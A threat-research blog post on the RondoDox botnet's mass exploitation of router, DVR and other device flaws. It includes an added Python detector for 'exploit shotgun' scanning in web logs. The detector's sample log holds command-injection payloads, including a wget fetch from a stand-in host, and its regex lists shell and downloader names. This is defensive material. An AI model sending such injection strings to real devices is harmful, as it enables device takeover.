rss-bridge 2025-10-09T00:00:00+00:00

RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits

Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.


By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus

Oct 09, 2025


Key takeaways

  • The campaign exposes organizations with exposed infrastructure to the risks of data exfiltration, persistent network compromise, and operational disruption.
  • Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vulnerabilities (KEV) catalog.
  • Prioritize patching of all listed vulnerabilities, especially those in the KEV catalog. Conduct regular vulnerability assessments, segment networks to limit lateral movement, and continuously monitor devices for anomalous activities. Trend Micro solutions already provide protection against vulnerabilities and flaws exploited in this campaign, helping organizations mitigate exposure while patching efforts are underway.

The Trend Zero Day Initiative™ (ZDI) Threat Hunting and Trend™ Research teams have identified a significant RondoDox botnet campaign that targets a wide range of internet-exposed infrastructure. The campaign uses over 50 exploits, including unpatched router flaws from more than 30 vendors, against vulnerabilities in routers, digital video recorders (DVRs), network video recorders (NVRs), CCTV systems, web servers, and various other network devices. Rather than targeting one device class, the latest RondoDox campaign takes an "exploit shotgun" approach: it fires multiple exploits at a host and sees which one hits.

From Pwn2Own to active in-the-wild exploitation

Our first RondoDox intrusion attempt began on June 15, 2025, when we identified a familiar vulnerability from our Pwn2Own Toronto event. This vulnerability, tracked as CVE-2023-1389, targets the WAN interface of the TP-Link Archer AX21 Wi-Fi router.

We previously reported on a Mirai campaign that exploited CVE-2023-1389 back in 2023, shortly after the Pwn2Own event. Vulnerabilities presented at our Pwn2Own consumer event continue to be popular with botnet operators.

Figure 1. Pwn2Own Ireland target list in the SOHO Smashup event including multiple networking devices

Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.

Figure 2. Tri Dang and Bien Pham (@bienpnn) from Qrious Secure were able to exploit two bugs (authentication bypass and command injection) at Pwn2Own Toronto 2022

RondoDox background: a new botnet emerges

RondoDox first surfaced publicly in mid-2025 as a stealthy botnet campaign that weaponizes longstanding command-injection flaws in internet-facing routers, DVRs, NVRs, CCTV systems, and other networking equipment to gain shell access and, ultimately, to drop multiarchitecture payloads. The initial RondoDox analysis authored by FortiGuard Labs highlighted an initial campaign, which focused on TBK DVRs and Four-Faith routers, through the exploitation of CVE-2024-3721 and CVE-2024-12856.

More recently, RondoDox broadened its distribution by using a “loader-as-a-service” infrastructure that co-packages RondoDox with Mirai/Morte payloads — making detection and remediation more urgent.

Figure 3. A timeline of the RondoDox vulnerability, from initial disclosure and first detection in 2025 to eventual widespread exploitation in large-scale campaigns

Below is the timeline of key events, from the discovery of the vulnerability to its exploitation by RondoDox:

  • December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022.
  • January 15, 2023: Pwn2Own vulnerability is reported to TP-Link. Coordinated public disclosure of CVE-2023-1389 with vendor.
  • June 15, 2025: First RondoDox event detected inside Trend Telemetry utilizing Pwn2Own Toronto 2022 bug, CVE-2023-1389.
  • September 22, 2025: Trend Threat Research triages a RondoDox exploitation spike inside Trend telemetry.
  • September 25, 2025: CloudSEK publishes a follow-up showing rapid growth via a loader-as-a-service model that distributes RondoDox alongside Mirai/Morte, with evidence of large-scale, rotated infrastructure.

Exploit shotgun: RondoDox’s expanded arsenal

Building on CVE-2023-1389 and other vulnerabilities, such as CVE-2024-3721 and CVE-2024-12856, RondoDox’s expanded arsenal now includes several additional CVEs and exploitation patterns observed in the wild. It’s a clear signal that the campaign is evolving beyond single-device opportunism into a multivector loader operation.

Notably, researchers tied the active exploitation of CVE-2024-3721 (TBK DVR) and CVE-2024-12856 (Four-Faith routers) to RondoDox activity, and a subset of the newly observed vulnerabilities was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, elevating them to immediate, high-priority patching targets for defenders.

Below we list the fresh CVEs researchers have seen in RondoDox campaigns, summarizing how each is being weaponized:

RondoDox targeted vulnerabilities

  • Total Vulnerabilities: 56
  • No CVE Assigned: 18
  • CVE Assigned: 38
  • Command Injection (CWE-78): 50
  • Path Traversal (CWE-22): 2
  • Buffer Overflow (CWE-120): 1
  • Authentication Bypass (CWE-287): 1
  • Memory Corruption (CWE-119): 1
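The "exploit shotgun" pattern described above has a detectable signature on the defender's side: a single source fires many distinct, product-specific request paths at one host in a short window, most of which miss (404) because the device is not the product the exploit expects, and, given that 50 of the 56 vulnerabilities in the tally are command injection (CWE-78), a large share of those requests carry shell metacharacters in their parameters. The following Python is an added example written for this page, not code from Trend Research or the RondoDox analysis; it parses combined-format web-server access logs, flags sources that hit at least `min_distinct` distinct paths within a sliding window, and tags requests whose URL-decoded target contains command-injection markers. All log lines, paths, and addresses are constructed (documentation address ranges, made-up paths) and do not reproduce any of the listed CVEs.

```python
"""Heuristic detector for "exploit shotgun" scanning in HTTP access logs.

Added example, not from the original post. Sample log lines and paths are
constructed and correspond to no real exploit.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache/nginx "combined" log format; timestamp is common-log format with zone.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r"(?P<status>\d{3}) \S+"
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Shell separators, substitution forms and downloader/interpreter names that
# have no place in a device's management parameters (matched after decoding).
CMDI_RE = re.compile(r"[;|`]|\$\(|&&|\|\||\b(?:wget|curl|chmod)\b|/bin/(?:sh|busybox)\b")

# Constructed sample: one noisy scanner (203.0.113.10) and one benign client.
SAMPLE_LOG = """\
203.0.113.10 - - [22/Sep/2025:10:00:01 +0000] "POST /cgi-bin/probe_a.cgi HTTP/1.1" 404 162
203.0.113.10 - - [22/Sep/2025:10:00:02 +0000] "GET /probe_b/ping?host=1.1.1.1%3Bwget%20http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 404 162
203.0.113.10 - - [22/Sep/2025:10:00:03 +0000] "POST /probe_c/setup.cgi HTTP/1.1" 404 162
198.51.100.7 - - [22/Sep/2025:10:00:03 +0000] "GET / HTTP/1.1" 200 5120
198.51.100.7 - - [22/Sep/2025:10:00:04 +0000] "GET /login HTTP/1.1" 200 2210
203.0.113.10 - - [22/Sep/2025:10:00:05 +0000] "GET /probe_d/?cmd=%60id%60 HTTP/1.1" 404 162
198.51.100.7 - - [22/Sep/2025:10:00:06 +0000] "POST /login HTTP/1.1" 302 0
203.0.113.10 - - [22/Sep/2025:10:00:07 +0000] "POST /probe_e/api/system HTTP/1.1" 200 44
203.0.113.10 - - [22/Sep/2025:10:00:09 +0000] "GET /probe_f/login.cgi HTTP/1.1" 404 162
203.0.113.10 - - [22/Sep/2025:10:00:12 +0000] "POST /probe_g/boaform/admin HTTP/1.1" 404 162
203.0.113.10 - - [22/Sep/2025:10:00:15 +0000] "GET /probe_h/?ip=127.0.0.1%24(sh) HTTP/1.1" 401 0
203.0.113.10 - - [22/Sep/2025:10:00:20 +0000] "GET /probe_i/web/index HTTP/1.1" 404 162
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "target": m.group("target"),
        "status": int(m.group("status")),
    }


def has_cmdi_indicators(target):
    """True if the (double-)URL-decoded path/query carries command-injection markers."""
    return bool(CMDI_RE.search(unquote(unquote(target))))


def summarize(recs):
    """Per-source summary: path spread, injection-marker hits and 404 share."""
    return {
        "distinct_paths": len({r["target"].split("?", 1)[0] for r in recs}),
        "requests": len(recs),
        "cmdi_hits": sum(has_cmdi_indicators(r["target"]) for r in recs),
        "not_found_ratio": round(sum(r["status"] == 404 for r in recs) / len(recs), 2),
    }


def find_shotgun_sources(lines, window=timedelta(minutes=5), min_distinct=8):
    """Return {ip: summary} for sources that request >= min_distinct distinct
    paths inside any sliding time window of length `window`."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            events[rec["ip"]].append(rec)
    reports = {}
    for ip, recs in events.items():
        recs.sort(key=lambda r: r["ts"])
        start, flagged = 0, False
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            span = recs[start:end + 1]
            if len({r["target"].split("?", 1)[0] for r in span}) >= min_distinct:
                flagged = True
                break
        if flagged:
            reports[ip] = summarize(recs)
    return reports


if __name__ == "__main__":
    for ip, report in find_shotgun_sources(SAMPLE_LOG.splitlines()).items():
        print(ip, report)
```

The two signals are deliberately kept separate: the path-spread test catches a shotgun run even when the probes are clean (path traversal, auth bypass), while the metacharacter test catches a lone command-injection attempt that never trips the spread threshold. Tune `min_distinct` and `window` to the host's normal traffic before alerting on either one, and feed confirmed hits into blocklists or the patch-prioritization work the post recommends.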


[...]

